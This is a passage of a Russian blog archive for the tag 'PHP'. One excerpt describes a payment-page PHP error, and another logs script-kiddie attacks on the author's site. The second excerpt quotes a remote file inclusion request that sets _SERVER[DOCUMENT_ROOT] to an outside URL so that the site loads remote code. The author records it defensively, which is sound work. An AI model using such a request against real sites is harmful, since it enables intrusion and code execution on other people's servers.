Архив метки: PHP

Ошибочное программирование

Сегодня пытался оплатить услуги “ВобляКобель” через платежную систему money.ua. После непродолжительной паузы, получил следующую ошибку: Warning: SoapClient::__construct(https://stat.voliacable.com:8080/wspay/PayService?wsdl) [function.—construct]: failed to open stream: Connection refused in /usr/local/sites/moneyua/public_html/volia.com/index.php on line 33 Warning: SoapClient::__construct() [function.—construct]: I/O warning : failed to load external entity "https://stat.voliacable.com:8080/wspay/PayService?wsdl" in /usr/local/sites/moneyua/public_html/volia.com/index.php on line 33 Fatal error: Error responding from payment gateway, gateway overload.… Читать далее »

Скрипткиды или боты

Хакеры, а точнее скрипткиды, не спят. Несколько дней назад на мой сайт начали проводиться попытки атак запросами, эксплуатирующими старую уязвимость в PHP. /var/log/messages: Oct  4 03:23:34 220 suhosin[28420]: ALERT — tried to register forbidden variable ‘_SERVER[DOCUMENT_ROOT]‘ through GET variables (attacker ‘77.242.37.212‘, file ‘/xxx/domain.tld/index.php’) Пример запроса (из лога апача): 211.111.213.195 — — [05/Oct/2009:08:26:22 +0300] «GET //?_SERVER[DOCUMENT_ROOT]=https://www.hotlinkfiles.com/files/2380695_oajch/IDtest.txt???… Читать далее »